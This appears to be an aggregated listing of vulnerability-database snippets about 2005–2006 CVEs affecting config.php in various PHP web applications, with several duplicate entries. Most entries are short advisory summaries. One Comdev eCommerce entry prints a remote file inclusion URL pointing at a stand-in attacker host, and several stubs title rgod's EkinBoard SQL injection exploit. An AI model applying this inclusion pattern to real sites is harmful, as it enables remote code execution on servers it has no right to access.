CVE-2006-0542

CVE-2006-0542 describes multiple SQL injection vulnerabilities in the NukedWeb GuestBookHost 2005.04.25, specifically in config.php where the email and password parameters are not properly sanitized. This allows remote attackers to execute arbitrary SQL commands via those parameters, potentially ...

CVE-2005-4686

PunBB 1.2.9 (often with F-ART BLOG:CMS) includes config.php before calling unregister_globals, enabling exposure of unspecified sensitive information. Root cause: premature/configuration sequencing in the initialization flow. Impact is limited to information disclosure; no explicit vector or expl...

Sql injection

Multiple SQL injection vulnerabilities in config.php in Insane Visions BlogPHP, possibly 1.0, allow remote attackers to execute arbitrary SQL commands via the 1 blogphpusername or 2 blogphppassword parameter in a cookie...

CVE-2006-0372

Multiple SQL injection vulnerabilities in config.php in Insane Visions BlogPHP, possibly 1.0, allow remote attackers to execute arbitrary SQL commands via the 1 blogphpusername or 2 blogphppassword parameter in a cookie...

CVE-2006-0372

Multiple SQL injection vulnerabilities in config.php in Insane Visions BlogPHP, possibly 1.0, allow remote attackers to execute arbitrary SQL commands via the 1 blogphpusername or 2 blogphppassword parameter in a cookie...

BlogPHP config.php SQL injection login bypass

--------------------Summary---------------- Software: BlogPHP Sowtware's Web Site: http://www.blogphp.net/ Versions: 12 Type: SQL Injection Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei -----------------Description--------------- Vulnerable scripts...

CVE-2005-4686

PunBB 1.2.9, when used alone or with F-ART BLOG:CMS, includes config.php before calling the unregisterglobals function, which allows attackers to obtain unspecified sensitive information...

CVE-2005-4214

CVE-2005-4214 concerns phpCOIN 1.2.2. Affected component: installation/config flow via config.php. Root cause: the _CCFG['_PKG_PATH_DBSE'] variable is not defined, causing an error message that leaks the installation path to remote attackers. Impact: partial disclosure of information (installatio...

EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution

this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allowcalltimepassreference = on registerglobals = on Sun-Tzu: "The rising of birds in their flight is th...

EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit

Exploit for unknown platform in category web applications ====================================================================== EkinBoard 1.0.3 config.php SQL Injection / Command Execution Exploit ====================================================================== this works with magicquotesg...

EkinBoard 1.0.3 - config.php SQL Injection Command Execution

EkinBoard 1.0.3 - config.php SQL Injection Command Execution this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allowcalltimepassreference = on...

EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit

No description provided by source. ?php ---ekin103xpl.php 10.47 16/11/2005 EkinBoard 1.0.3 config.php SQL Injection through cookie / remote commands execution --- this works with magicquotesgpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields,...

CVE-2005-2544

PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...

comdevInclusion.txt

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

Comdev eCommerce config.php Vulnerability

Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...

CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

CVE-2005-2149

CVE-2005-2149 affects Cacti

DEBIAN-CVE-2005-2149

config.php in Cacti 0.8.6e and earlier allows remote attackers to set the nohttpheaders switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...

CVE-2005-1696

Multiple cross-site scripting XSS vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the 1 skin or 2 paletteid parameter to demo.php in the Xanthia module, or 3 the serverName parameter to config.php in the Multisites aka NS-Multisites...